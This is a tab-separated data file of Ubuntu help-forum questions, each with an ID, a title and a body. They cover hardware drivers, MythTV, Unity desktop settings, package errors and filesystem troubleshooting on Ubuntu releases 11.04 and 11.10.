74958	how do i configure a tivo remote ?	i would like to use my tivo remote instead of the streamzap one . has anyone setup a tivo remote with mythbuntu and if so would you share your configurations ( lircd.conf/lircrc ) and experiences ?
74959	how to keep a bright screen with battery power ?	it would seem that one would go to the power settings , and adjust the amount of time before the screen becomes dim , but unlike the nice images displayed in always be 100 % bright when i 'm using battery , my power settings have no options for the length of time until the screen dims . here 's what my power settings look like : how can i prevent the 10-seconding dimming screen , when on battery power ?
74961	best versions of ubuntu for thinkpad t21	anybody have any experiences about installing ubuntu onto a thinkpad t21 ? thanks !
74963	opening a ntfs partition fails with report : not authorised	besides lesser errors on 11.10 , i ran into a more annoying one : i can not access ntfs partitions . no matter whether i use nautilus , dolphin , tux commander or archive manager , always does the same thing , could not mount 'disc name ' : not authorised' there were several fixes of problems with access to ntfs partitions , but none of them helped . when i used nautilus in sudo mode , the partition looked empty , although when i booted on windows , there were files . it was reported as a bug somewhere . can anyone help me ?
74964	touchpad stopped working on an acer aspireone d255e	i have a less than a year old acer aspireone d255e with a fresh install of ubuntu 11.10 . everything has been working fine . great os and great netbook . but today the touchpad stopped working . it had been working fine . i closed the netbook and when i opened it again , a couple of hours later , i could not move the pointer with the touchpad . i can not get the pointer to move . i cleaned the touchpad surface well , just in case . everything else is working fine . all the software updates are up-to-date . i have rebooted several times with no solution . i have attached an usb mouse and the pointer works well . what can i do to troubleshoot the problem ? i have gone to the system settings , touchpad section , and there is not much that i can do there . i would like to determine first if it is a hardware or software issue and then how to resolve it . is there a way that i can reinstall the touchpad drivers . just in case it is a software problem ? i have been using ubuntu for nearly a year now and am very happy with it . are there any wise ubuntu gurus out there who can help me ? thank you for reading this note .
74966	remove terminal first message	i have just installed ubuntu 11.10 and i am getting this message : to run a command as administrator ( user `` root '' ) , use `` sudo < command > '' . see `` man sudo_root '' for details . every time i run a terminal window . how can i disable it ? thanks .
74972	how to keep unity 2d launcher visible with fullscreen apps ?	using gconf-editor , i have set the following : /desktop/unity-2d/launcher hide_mode 0 use_strut ticked when i fullscreen an app or bring a window close to the left edge of the screen , the launcher still hides . ( i have similar setting in ccsm too , just in case ) how do i get the launcher to always be visible ?
74975	run ubuntu from flash drive very slow	i used startup disk creator on my ubuntu ( 11.10 ) ( this computer ) and i found out that when i boot it from my old computer , it 's extremely slow . my internet is out right now and i 'm looking for ways to move the boot files to the preinstalled windows 2000 ( on the old computer ) and boot it off from the hdd instead . i found out that this is because my old computer is using an intel pentium 4 and my office depot usb has a slow data transfer rate . does anyone know how to move these boot files to the hdd and boot it off of there ? yes , sadly , there 's no internet yet and i 'm looking for a dual-boot .
74978	how to automatically unlock private ssh key ?	i have generated an rsa public / private key pair using ssh-keygen . however , i am prompted to enter the password to unlock it the first time it is used each session . how can i automatically have it unlocked after login ? even better : since this is running on an ubuntu server , it would be great if it was never locked at all - that way the automated daemons that need it would not require manual intervention to use it .
74980	what to do when it says `` unable to locate package '' policykit	i 'm following a tutorial that says i need to run sudo apt-get update and then install a whole bunch of packages . all of them work , except policykit . it gives me unable to locate package policykit . is there something i need to do to help ubuntu find it . i 'm new to ubuntu so not sure how this works , or if i need to put the ubuntu installation cd for this to work or what .
74983	`` could not find the iso /ubuntu-11.10-desktop-i386.iso ''	i used grub4dos to install ubuntu , but it gave me this information : could not find the iso \ubuntu-11.10-desktop-i386.iso i 'm sure i put the iso file in a correct pattern ( c : , fat32 ) , and the filename is properly typed . after that , i tried wubi installation , but after rebooting it shows like this : could not find the iso \ubuntu\install\installation.iso what should i do ?
74986	how to hide items in unity 's top panel ?	i just updated to natty and now the default top panel has icons for mail , chat , and power ( lock , restart , etc . ) in lucid and maverick i could just right click on them and remove from panel , but that does n't seem to work anymore . how can i get rid of these icons ? edited to add screenshots the indicator i want to get rid of is the one that looks like an envelope : when i click it , it displays these choices :
74989	how can i record from my microphone input ?	i have an audio input plugged into my mic jack . in alsamixer , when i unmute and amplify the mic input , i can hear this audio out of my speakers . however , running arecord -d 5 foo.wav and aplay foo.wav results in an empty file ; the same when recording through audacity - empty . why does this happen ? how do i record this input ? arecord -l produces the following , if this is helpful : default playback/recording through the pulseaudio sound server pulse playback/recording through the pulseaudio sound server front : card=nforce2 , dev=0 nvidia nforce2 , nvidia nforce2 front speakers surround40 : card=nforce2 , dev=0 nvidia nforce2 , nvidia nforce2 4.0 surround output to front and rear speakers surround41 : card=nforce2 , dev=0 nvidia nforce2 , nvidia nforce2 4.1 surround output to front , rear and subwoofer speakers surround50 : card=nforce2 , dev=0 nvidia nforce2 , nvidia nforce2 5.0 surround output to front , center and rear speakers surround51 : card=nforce2 , dev=0 nvidia nforce2 , nvidia nforce2 5.1 surround output to front , center , rear and subwoofer speakers surround71 : card=nforce2 , dev=0 nvidia nforce2 , nvidia nforce2 7.1 surround output to front , center , side , rear and woofer speakers dmix : card=nforce2 , dev=0 nvidia nforce2 , nvidia nforce2 direct sample mixing device dmix : card=nforce2 , dev=1 nvidia nforce2 , nvidia nforce2 - mic adc direct sample mixing device dsnoop : card=nforce2 , dev=0 nvidia nforce2 , nvidia nforce2 direct sample snooping device dsnoop : card=nforce2 , dev=1 nvidia nforce2 , nvidia nforce2 - mic adc direct sample snooping device hw : card=nforce2 , dev=0 nvidia nforce2 , nvidia nforce2 direct hardware device without any conversions hw : card=nforce2 , dev=1 nvidia nforce2 , nvidia nforce2 - mic adc direct hardware device without any conversions plughw : card=nforce2 , dev=0 nvidia nforce2 , nvidia nforce2 hardware device with all software conversions plughw : card=nforce2 , dev=1 nvidia nforce2 , nvidia nforce2 - mic adc hardware device with all software conversions changes made on the input tab of the system settings - > sound dialog make no difference at all . no sound comes out of my speakers because of them , and audacity records nothing as a result of changing any setting ( either the connector or the input volume ) . there is only one `` device for sound input '' - the internal audio analog stereo . oddly , in audacity , changing the recording source ( say from default : line:0 to default : mic:0 , or even mono to stereo ) sets the mute checkbox on the aforementioned dialog .
74993	ubuntu 11.10 unable to reconize monitor while running in vm	i 'm currently running ubuntu 11.10 64bit in a virtualbox vm and for some reason it has be stuck at 1024x768 , with the monitor being unrecognised ( shows as unknown ) . is there a way to tell ubuntu that i have a monitor that can show a higher resolution and hence obtain more real estate for my vm ?
74995	ubuntu wont recognize asus transformer	i plug in my asus transformer tf101 to my asus n43jm notebook computer running ubuntu 11.10 64it but no usb device is recognized ... not even that something `` unknown '' was plugged in . however it does recognize it in windows 7 ...
74996	suspend when critically low power 11.10	is there a way to suspend when ubuntu is at critically low power . the only option in ubuntu 11.10 power setting is to shutdown or hibernate . i run my battery all the way down till it suspends then i plug it in . it gets annoying when my computer hibernates at critically low power . thanks in advance for the help
74997	vga not detected after upgrading ubuntu	my desktop pc using ati radeon hd 4350 , when i installed ubuntu 11.04 and running application for checking and install propertary vga driver ( jockey-gtk ) then my 11.04 screen resolution , activating desktop effect compiz , etc works well . but the problems comes after i upgraded ubuntu from 11.04 to 11.10 , i ca n't login to my account but works by using guest account . and my 11.10 not detecting ati radeon hd 4350 although i reinstall then reactivated the propertary driver . thanks for any suggestion and help .
75002	selecting gnome from login screen launches gnome classic everytime	i have installed gnome 3 with sudo apt-get install gnome-shell on ubuntu 11.10 . but when i choose the 'gnome ' profile on the login screen i get the 'gnome classic ' profile instead . nothing even similiar to the awesome screenshots i have seen on many blog posts . how to launch the real 'gnome ' ? thanks . p.s can this be because of not having the proper video drivers installed ? because i do n't have yet ...
75003	how to reset the number of workspaces ?	for some reason my workspaces have disappeared . looks like i only have 1 , how could i reset my workspace settings for a particular account ? if i login to the guest account , the workspaces work fine , but under my primary account it does not .
75008	macbook pro 7.1 ubuntu 11.10	ive just installed ubuntu 11.10 on my macbook pro 7.1 . there are a few things that i cant get to work correctly . the first is the temperature control . the fans do n't seem to run at all and my macbook pro gets really hot and sluggish . secondly is the sound , the sound does n't seem as loud as it is under macosx , and the same as the brightness its really dim and i cant get it as bright , i think this is due to fact i cant find the nvidia driver that i had installed when i was running 10.04 . thanks in advance .
75010	what open source configuration management software with a gui is available ?	i want to mange multiple ubuntu desktop ( 10.04,11.04 and 11.10 ) from server . like i want do following list of thing 1 ) policy management 2 ) package management 3 ) various system administration thing 4 ) user management it should open source solution , easy to manage ( grpahichal ) eagerly waiting for reply please answer
75012	how do i install gcc-4.3 ?	is there and easy way to install gcc-4.3 on oneiric ? i really need it because matlab depends on i for the creation of mex-files i tried changing all my resopistories back to maverick just to install gcc-4.3 but i get this error : refl_v0p8_linux_and_windows % sudo apt-get install gcc-4.3-multilib libstdc++6-4.3- dev reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gcc-4.3-multilib : depends : gcc-4.3 ( = 4.3.5-3ubuntu1 ) but it is not going to be installed depends : libc6-dev-i386 ( > = 2.5 ) but it is not going to be installed libstdc++6-4.3-dev : depends : g++-4.3 ( = 4.3.5-3ubuntu1 ) but it is not going to be installed e : broken packages
75014	how can i install a canon printer mp190 driver ?	i tried to install the mp190 drivers , but appeared a message show me that requires to have libcupsys2 . i understand that libcup2 is an update of libcupsys2 . how do i solve this ?
75015	screen resolution change after play game	i installed supertuxkart . i played this game in fullscreen . after close the game my screen resolution has been changed . it is happening every time when i play any game in fullscreen mode . is it a bug or normal thing ? . windows can recover default resolution after close any game . thanks in advance
75017	what is the import process in thunderbird for backup.pst files	i am not able to restore my previous mail backup data file backup.pst . kindly help on the same .
75018	sound and video skips on ubuntu 11.10 64 bit	i preformed a dist-upgrade from 11.04 to 11.10 and now i can not listen to any music or sounds ( log on sound included ) , nor watch video without it stopping and then catching up and stopping again ( this is flash or .mp4 through vlc ) . i did not have this issue with 11.04 and have even just preformed a fresh install of my system . i have tried to reinstall pulse audio and removing the .pulse folder but to no avail . any help would be appreciated .
75024	batch printing from unity ? shell ?	is there a way to batch print some files ( pdfs ) ?
75025	brightness control wo n't work on a samsung nf208	i just installed ubuntu 11.04 on my samsung nf208 and at first it worked just fine , the fn key was all alright except the fn+f9 ( i guess that 's normal as it opens up a samsung-specific software ) . yesterday i updated my ubuntu and after i rebooted the system , the brightness control key ( fn + up/down ) just wo n't work . it does display the brightness indicator and the indicator itself is changing when i press the fn + up/down , but the display wo n't change a bit . please help me , i 'm new to this ubuntu thing : ) p.s i experienced same thing when i use win7 after i installed an update for intel graphic driver . i managed to rollback the driver and it worked again . do i get the same problem here in ubuntu ? then how can i rollback the driver in ubuntu ? or is it a totally different problem ? thanks for your concern.. : )
75038	problem accessing web based email with firefox	i am running natty narwhal and all of a sudden i am unable to access any web based email ( like yahoo mail ) i enter my user name & password and hit the login button and the page that loads keeps resetting really fast and never finishes loading . the url keeps changing with each reset . if i did not know any better i would assume that it was trying every user name/password combination to attempt to get illegal access to an/my account . however i have been able to bypass that using the tor browser so i know that is is local to my copy of firefox but i do not know what files to replace/remove/edit to fix this problem . yes i have done a virus scan with clam anti virus and found nothing . please someone help !
75041	expo and workspace shortcut super + s not working	it says here and here that the keyboard shortcut for expo mode of all windows , while zooming out on workspaces , is super+s . however , when i push the command it just zooms out the workspaces ; it does not do the expo mode . how can i fix this ? i 'm on ubuntu 11.10 with unity .
75047	how to retrieve my files from a corrupted ubuntu	been trying for various answers to this for a while background : i run a partitioned hard drive with windows xp and ubuntu . i have important files on both partitions but most of them are on the ubuntu side . problem : interrupted update process from ubuntu 11.04 ( i think it 's that one , though might have been a special netbook version ) to the new 11.10. result is that i can not reboot . the screen gets stuck at the startup screen with dots . i can not access the terminal from here , despite some forum posts suggesting that this should be possible . same goes for the ( recovery mode ) option - no joy . this obviously means that i cant access the files in the ubuntu part of the drive . my approach so far has focused upon accessing the lost files . i have made a boot usb for ubuntu 11.10 and successfully booted to it . i hoped that it would allow access to the old files . it does n't - from what i can tell the files are in a folder that is locked ( 'permission denied ' or something to that effect ) . i have tried accessing the files from windows using diskinternal 's linux reader and similar programs . these do n't seem to work - they provide long lists of files with incomprehensible names which cant be opened . the one thing i have n't tried is running the main install option for 11.10 from the usb booted desktop . i 'm worried that it would erase the files i 'm trying to retrieve . any thoughts there ? i realize that the main avenue i have n't looked at is to try to fix the corrupted 11.04 version of ubuntu . however i have almost no experience of using the terminal and am a complete newbie in this respect . i can enter commands directly from something i 'm given but cant problem solve myself - just have no idea what i 'm doing . if i was to take this approach i 'd need my hand held the whole way . so , can anyone help me here ? would be hugely appreciative !
75054	screen repaint problem with emacs and terminals	when i 'm using emacs in ubuntu 11.10 , i have the following problem : i navigate with c-n and c-p , sometimes screen is not correctly updated and i see the text garbled . sometimes i have a similar problem with the terminal as well . any help is really appreciated .
75056	how to append text to file every morning ?	i would like to append current date to text file every morning at 7am . if the computer is turned off i would like it to be executed after its turned on .
75058	how can i take a full page screenshot of a webpage from the command line ?	i have installed cutycapt on my linode vps and using it to generate screenshots by following command . xvfb-run -- server-args= '' -screen 0 , 1024x768x24 '' ./cutycapt -- url=http : //www.google.com -- out=example.png its working great as expected . the only problem is what if the page can be scrolled vertically ( ie . greater than 768 in height ) ? the screenshot will be chopped in that case . one possible solution is to take a longer height of screen ( say , 2000 ) , and then remove the white space from bottom . but that wo n't be an optimal solution . can someone suggest me a better solution ?
75059	mysqld gives errcode:13 because it ca n't create test files	new installation of 11.04 . then i followed all instructions here : http : //www.howtoforge.com/installing-apache2-with-php5-and-mysql-support-on-ubuntu-11.04-lamp now when i run mysqld i get this error : makara @ rahu : ~ $ mysqld 111103 13:39:37 [ warning ] ca n't create test file /var/lib/mysql/rahu.lower-test 111103 13:39:37 [ warning ] ca n't create test file /var/lib/mysql/rahu.lower-test mysqld : ca n't change dir to '/var/lib/mysql/ ' ( errcode : 13 ) 111103 13:39:37 [ error ] aborting 111103 13:39:37 [ note ] mysqld : shutdown complete someone on irc said it might be a package issue ? ? thanks beet
75061	should i use btrfs or ext4 for my ssd ?	should i use btrfs ( with discard , compress=lzo and space_cache options ) or ext4 ( with discard option ) for the ssd for my ubuntu 11.10 ( oneiric ) amd64 desktop root partition of my office machine ? /home will be an hdd so fs reliability affects os not my data .
75066	what version of qt is supposed to be in 11.10 ?	i recently installed ubuntu 11.10 . in distrowatch the version of qt is 4.7.4 . in installation is 4.7.4 too . but i think it 's not the real qt 4.7.4 ! because there is no persian translation in /usr/share/qt4/translation . in archlinux everything is ok but in ubuntu qt looks to be 4.7.3 : -/
75068	can i change the vertical scaling independent from the horizontal scaling when using my bamboo stylus in relative mode ?	can i change the vertical scaling independent from the horizontal scaling when using my stylus in relative mode ? i use a wacom bamboo pen & touch , with the stylus in relative mode ( instead of the default absolute ) . i use two monitors side-by-side , giving me a screen area of 3840x1080 pixels ( 3.5 aspect ratio ) . the tablet is 14720x9200 `` units '' ( 1.6 aspect ratio ) . if i move my stylus 1 cm in the horizontal direction it will move much further on the screen than if i move it in the vertical direction ( 3.5/1.6 = 2.18 times further ) . how can i change this ? i have tried changing two settings : area , as suggested in a related answer , but this seems to affect only the active area of the physical tablet coordinate transformation matrix , but this seems to only have an effect in absolute mode .
75071	one of my user accounts logs in without desktop environment	when i log in to my main user account on ubuntu 11.10 , the desktop environment ( unity bar , clock , volume control , etc . ) is not there . all i have is the desktop background with a menu bar across the top which appears to be for nautilus ( options like file- > new folder ) . my other accounts log in like normal . i have recently followed these instructions to give my main user account access to an osx partition , but i think i have logged in successfully since then . i am able to get a terminal by pressing ctrl+alt+t , but when i typed unity the whole thing crashed . is there anything i can do to fix this ? i have a separate administrator account i can use if needed .
75072	is acpi useful on a server ?	should i install acpi on ubuntu server ? for potential power managing features ? i was thinking power down button would be useful for less terminal skilled users who do n't know how to connect using ssh and shutdown with command . what do you think ? what other things can i do with acpi ?
75073	enable scroll by dragging my stylus ?	how can i configure my wacom bamboo pen & touch stylus to scroll when i hold one of the buttons on the stylus and drag with it ? this is a standard supported operation on the mac , but i ca n't find how to configure it in ubuntu ?
75076	what version of the catalyst driver ships with 11.10 ?	hello i wonder if ubuntu is using the new 11.10 driver . or do i have to install it manually from amd 's site ?
75078	launcher window dodge does n't work	in two accounts i have the launcher set to `` dodge windows '' ( confirmed via ccsm ) . however , in one account it does n't work , the launcher is stuck open as though i 'd selected `` never '' . i found some hints about this on other au questions ( which i ca n't find again right now : ( ) which involved : logging out and in again pressing the super key installing ccsm and changing the setting deleting some files in my home directory ( ca n't remember which ) none of these have changed the launchers behavior . what could be wrong in my misbehaving account ? this is not related to a specific application nor workspaces ( i do n't have any windows open in any other workspace ) .
75081	upload multiple files or folders to ubuntu one ?	am i able to upload multiple files and/or folders at a time to ubuntu one ? i am not interested in downloading the ubuntu one manager for windows to sync files ; i simply want to sign in to my ubuntu one storage & upload multiple files ( photos , videos , etc ) all at once instead of one-by-one .
75082	upgrading ubuntu ( 32 bit ) 10.10 - > 11.04 fails and causes a kernel panic on boot	on ubuntu 10.10 machine upgrade to ubuntu 11.04 using the update manager . the upgrade fails and leaves the system in an unstable state . when i reboot the system i get a kernel panic on boot . the error points to /opt/abc/runtime/lib/libc.so.6 . by researching on this i found that there is a third party software abc causes problem . it has it 's own runtime ( libc ) library . in /lib/ directory there is a link file /lib/ld-abc.so.2 -- - > /opt/abc/runtime/lib/ld-linux.so.2 . if we rename this file to /lib/abc.so.2 or remove this file the the upgrade is success . here is the upgrade log of where it crashes ( apt-term.log ) ===== services restarted successfully . processing triggers for libc-bin ... ldconfig deferred processing now taking place /usr/bin/dpkg : /opt/abc/runtime/lib/libc.so.6 : version `glibc_2.11 ' not found ( required by /usr/bin/dpkg ) /usr/bin/dpkg : /opt/abc/runtime/lib/libc.so.6 : version `glibc_2.8 ' not found ( required by /lib/libselinux.so.1 ) ===== could you please let me know what would be the problem of having a run time link library file in /lib directory . does the ubuntu upgrade check the 3rd part runtime as well ?
75087	how do i boot a server without x ?	i 'm looking for a solution , to start my server only with a shell . i do n't need the unity windowmanager because i want to save ressources . on this server runs a webserver with my webservices in semi-production . so for default it is enough to start in a bash and access the server vie putty . no windowmanager is needed . please assist , how to configure the system to start only in shell by default ?
75088	apps not showing in unity dash	i have the following problem : apps are not showing in the unity dash under ubuntu 11.10 . as far as i remember i did not have that problem under 11.04 , but i 'm not certain . most often than not i use apps which are already in the launcher . i tried using unity -- reset but that did n't stop the problem from resurfacing . i hope someone can help .
75090	hp deskjet f300 printer not printing documents	since upgrading to ubuntu 11.10 my printer - an hp deskjet f300 series - will no longer print from any word processor , including gedit . the scanner still functions and i can print emails . it was working correctly with textmaker , libreoffice and gedit before the upgrade
75093	remove drag- and resize-icons ( and what is the name of this feature ? )	suddenly a window has drag , and resize `` circles '' overlayed . it looks like a unity feautre , but i do n't know its name , nor how to toggle it `` off '' . see screenshot for how it looks . it seems a nice feature , so if there are shortcut keys to toggle this on-and-off per window , i would be glad to hear those .
75094	sshfs transform_symlinks is broken	i 've been using the same fstab command for a while now : sshfs # user @ host.be : /home/user /home/user/vps fuse user , port=22 , uid=1000 , gid=1000 , allow_other , reconnect , transform_symlinks 0 0 and it used to work fine . but on 11.10 it does n't transform symlinks anymore , they 're all reported as broken , even though the option is clearly set . what gives ?
75096	tar : `` can n't stat : no such file or directory ''	following command sudo tar jcf /datos/backup/news/news.tar.bz2 -c /var/www/news news is giving `` tar : can n't stat : no such file or directory '' error . how can i solve this problem ? as it had been answered in my previous question i am using -c option in order to skip leading directories . it was working in one ubuntu server and now in my ubuntu desktop it is giving that error message .
75097	how to remove alt+f7 window moving hot-key in xubuntu ?	i 'd like to use alt+f7 to search for files in double commander . but when i press alt+f7 - the hotkey is intercepted and i am offered to move the window . settings - settings manager - keyboard - application shortcuts does n't show alt+f7 to be bound to anything . where can i undefine alt+f7 hot key then ?
75108	how to install 32-bit deb package on 64-bit ubuntu ?	i have ubuntu 11.10 64-bit installed and i have to install 32-bit deb package on it . it depends on other 32 bit libraries . i overcome this with getlibs : sudo getlibs -i ./hp-netconnect_1.2-12_i386.deb package is installed successfully and i can use it , but now i ca n't install anything with apt-get : ytaras @ bueno : ~/downloads $ sudo apt-get install bison-doc reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : hp-netconnect : i386 : depends : openssl : i386 but it is not going to be installed depends : procps : i386 but it is not going to be installed depends : zenity : i386 but it is not going to be installed depends : sun-java6-jre : i386 but it is not installable or sun-java5-jre : i386 but it is not installable recommends : sun-java6-plugin : i386 but it is not installable e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . if i run 'apt-get -f install ' , it just removes hp-netconnect package . now i have to uninstall this package with 'apt-get -f install ' every time i want to install something and reinstall it later .
75112	intel hd drivers	i have a lenovo g470 notebook and i want know if to improve my video card driver i have to only install kernel 3.1 , or if i have to install a new intel video card driver , eg . xorg edgers ? thanks .
75114	can i move a window to another viewport using the mouse wheel on its titlebar ?	i struggled with ccsm without success to do that . as i only use 2 viewports , this feature would be awesome . i remember this was possible when i used kde , back in the days .
75116	how do you build older gcc versions ? errors about crti.o not being found	how can i build an older gcc ( specifically , 4.5.2 ) on ubuntu 11.10 and avoid errors about `` /usr/bin/ld : can not find crti.o : no such file or directory '' ? i 've done a bit of digging and found several similar items , but none that actually resolve my issue : i 've verified all my packages ( libc6-dev and the like ) are re-installed per this question i 've verified crti.o exists in /usr/lib32 and /usr/lib/x86_64-linux-gnu , and that my ld.so.conf is configured to look in those directories i 've verified that prepending my make invocation with library_path=/usr/lib/x86_64-linux-gnu works , but would like to avoid this ( it becomes a diverging point in makefiles ) i 've tried various things with -- with-build-sysroot , but with no success ( read : maybe i just do n't know the right flag to set ) when running with strace ( as per this answer ) , i can see the bare reference to crti.o : 13240 open ( `` crti.o '' , o_rdonly ) = -1 enoent ( no such file or directory ) thanks !
75117	one of my user accounts logs in without system sounds	one of my user accounts logs in without system sounds in ubuntu 11.10 . all other sounds works well , i can listen music , see movies , etc without a problem . system sounds like errors , login , shut down , etc do n't play . thanks for any help .
75120	how can i safely resize ( shrink ) a btrfs partition ?	i have my /home on a btrfs partition and i need to shrink it , unfortunately gparted does not have the resize option for this fs . can i resize it in any other way without losing my data ?
75133	ubuntu dvr - what are the options ?	according to my research , the best solution to use ubuntu server as a dvr system would be zoneminder . is there any alternatives to zoneminder out there ? i 'm not really happy it only has a web interface to control/view my cameras . and it does n't have an option to record video stream non-stop . am i missing something in its configuration ? and the thing i really disappointed , i cant find a way to control my ptz camera with it . what do manufacturers sell along with their standalone linux powered dvr systems ?
75134	add btrfs root parition entry to grub2	i have a separate 10gb partition to test pre-release builds . this time i decided to test the btrfs as root . after finishing installation , ubiquity showed an error message stating that grub could not be installed and i must install it manually . i thought 11.10 supported grub on btrfs . anyways , here is my partition scheme . /dev/sda1 ext4 / ( oneiric ) /dev/sda2 ext4 /home /dev/sda3 btrfs / ( oneiric ) the problem is that grub does not pick up /dev/sda3 entries using update-grub2 command . how do i manually add an entry for /dev/sda3 to grub2 so that i can choose which installation to boot into ?
75137	why are the mythvideo settings blank in the frontend in mythtv 0.22 and later ?	in the mythtv 0.22 frontend , why are the default settings blank ? why are these not populated to the correct content directory ?
75139	why ca n't i play iso 's in mythtv 0.22 ?	when trying to play any video in mythvideo that is an iso , it fails to play . playing other types of videos is fine .
75140	how to make the gnome music player client ( gmpc ) my prefered ubuntu music player application ?	how can make gmpc my default music program and integrate it with the unity top-bar just as rhythmbox or banshee ? thank you , pedro
75142	why does n't ( xine , vlc , etc ) work on mythtv 0.22 and later ?	i used to be able to use an external player for video playback , but now that i have updated mythtv i no longer have that option .
75144	where is the video manager in mythtv ?	i can no longer find the video manager in new versions of mythtv . where did it go ?
75146	download from software center fails	what should i do ? in ubuntu 11.10 when im trying to dl something from usc it says check your internet connection while im online ! ! ! & then it says `` requires installation of untrusted packages '' ! ! ! what should i do ?
75150	taskbars/unity are visible in the mythtv frontend even when the frontend is fullscreen	when the mythtv frontend is full screen , the taskbars and/or unity is still visible . how can i hide them ?
75153	i just installed mythbuntu , what is the mysql root password ?	after installing mythbuntu , i am unable to access mysql as i do n't remember setting a root password . what is the default password ?
75154	can not move file to trash warning when trying to delete a file in nautilus	i am trying to delete files in nautilus and every time i try to delete one it always gives me this message : can not move file to trash , do you want to delete immediately ? then it gives me several questions . all i want is that when i press delete in the keyboard it sends it automatically to the trash can . not to ask me every time . the problem relates to ntfs partitions , external drives but also include linux filesystems . what are the reasons for nautilus beeing not able to move to trash ?
75156	how do i update to the latest mythtv release ?	i want to update to the latest mythtv release , but it is n't available in the ubuntu repository . where can i get it from ?
75158	ca n't do anything after moved launcher to bottom	i used this http : //www.webupd8.org/2011/10/how-to-move-unity-launcher-to-bottom-of.html and when i restarted computer , launcher , panel and skype window showed for 1-2 seconds ( launcher was on bottom ) and disappeared . i tried restart the computer , but this did not help . i set autologin , so i ca n't switch to unity 2d . i tried ctrl+alt+backpace to log out , but nothing happened . i do n't want to reinstall system , because there are important files in home folder , and if i do n't format /home partition all my settings will stay and i still have this problem . how to fix it ?
75162	no desktop icons after upgrade to 11.10	i just upgraded from 11.04 to 11.10 and after restart it showed the login screen . after login , only the desktop background shows with ubuntu 11.10 text at the bottom-left corner . did my gnome stop working ? my mouse pointer moves though , so its not a system crash . these are my h/w specs : ubuntu 11.04 x86_64 • intel core 2 quad q6600 2.4ghz 8mb cache 1066mhz intel mobo dg33 8gb ddr2 ram @ 800mhz • 1gb 8600 gt nvidia graphics card • dell sp2309w • lg flatron l222ws
75164	vga not detected on a lenovo t420	i have problem with a vga driver that is not detected on my lenovo t420 with ubuntu . 10.04 output of lshw : *-display unclaimed description : vga compatible controller product : intel corporation vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : latency=0 resources : memory : f0000000-f03fffff memory : e0000000-efffffff ( prefetchable ) ioport:5000 ( size=64 ) this is output from lspci -nn : 00:02.0 vga compatible controller [ 0300 ] : intel corporation device [ 8086:0116 ] ( rev 09 ) when i install version 11 for testing it can detect the drivers : 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) *-display description : vga compatible controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:42 memory : f0000000-f03fffff memory : e0000000-efffffff ioport:5000 ( size=64 ) on ubuntu 10.04 , i tried to install the xserver-xorg-video-intel driver but i 'm still unable to get the right resolution on my display . i 've already tried the suggestion on display not detected on a thinkpad t420 , but still no luck .
75172	can i install ubuntu in viewpad 97i ?	viewpad 97i is a pad device that can install win7 and have usb2.0 port . can i use it to install ubuntu ? i want to know if someone has tried this for ubuntu . i can not decide if i should buy it or ipad2 .
75178	how to transfer files from windows 7 to linux ubuntu ?	i have to transfer huge files ( like 20gb ) , how can i do that without formatting my windows ( np if i format my ubuntu ) ? note : i 'm using ubuntu 11.04
75180	alternative to gnote when using unity	i like the gnote is a great application but unfortunately has no app icon , i would like to know if there is any alternative to gnote working in the systray of unity . note : tomboy is not an option
75186	wrong sound in center speaker on an asrock ion 330	after i upgraded my asrock ion330 to ubuntu 11.10 the center speaker has moved to rear left . this is the output from aplay -l : discard all samples ( playback ) or generate zero samples ( capture ) default : card=nvidia hda nvidia , vt1708s analog default audio device front : card=nvidia , dev=0 hda nvidia , vt1708s analog front speakers surround40 : card=nvidia , dev=0 hda nvidia , vt1708s analog 4.0 surround output to front and rear speakers surround41 : card=nvidia , dev=0 hda nvidia , vt1708s analog 4.1 surround output to front , rear and subwoofer speakers surround50 : card=nvidia , dev=0 hda nvidia , vt1708s analog 5.0 surround output to front , center and rear speakers surround51 : card=nvidia , dev=0 hda nvidia , vt1708s analog 5.1 surround output to front , center , rear and subwoofer speakers surround71 : card=nvidia , dev=0 hda nvidia , vt1708s analog 7.1 surround output to front , center , side , rear and woofer speakers iec958 : card=nvidia , dev=0 hda nvidia , vt1708s digital iec958 ( s/pdif ) digital audio output hdmi : card=nvidia , dev=0 hda nvidia , hdmi 0 hdmi audio output dmix : card=nvidia , dev=0 hda nvidia , vt1708s analog direct sample mixing device dmix : card=nvidia , dev=1 hda nvidia , vt1708s digital direct sample mixing device dmix : card=nvidia , dev=3 hda nvidia , hdmi 0 direct sample mixing device dsnoop : card=nvidia , dev=0 hda nvidia , vt1708s analog direct sample snooping device dsnoop : card=nvidia , dev=1 hda nvidia , vt1708s digital direct sample snooping device dsnoop : card=nvidia , dev=3 hda nvidia , hdmi 0 direct sample snooping device hw : card=nvidia , dev=0 hda nvidia , vt1708s analog direct hardware device without any conversions hw : card=nvidia , dev=1 hda nvidia , vt1708s digital direct hardware device without any conversions hw : card=nvidia , dev=3 hda nvidia , hdmi 0 direct hardware device without any conversions plughw : card=nvidia , dev=0 hda nvidia , vt1708s analog hardware device with all software conversions plughw : card=nvidia , dev=1 hda nvidia , vt1708s digital hardware device with all software conversions plughw : card=nvidia , dev=3 hda nvidia , hdmi 0 hardware device with all software conversions i have also edit /etc/pulse/daemon.conf with this line : default-sample-channels = 6 do i have to edit the line : default-channel-map = front-left , front-right ? ? i have sound in right , left . reverse sound in center and rear left , and no sound i rear right , subwoofer ok . restart pulseaudio ( and also tried to restart ubuntu ) . no luck . i have also selected hdmi 5.1 in audio - > hardware what has gone wrong ? ? it worked like an charm in 10.10 and 11.04
75190	how to stop disconnecting when using alfa wireless usb device ?	my internet keep disconnecting every 3 minutes , ubuntu connected to internet using my alfa wireless adapter awus036h without any drivers , but still i get disconnects.. should i install driver for my device ? ( i could n't find it anyway )
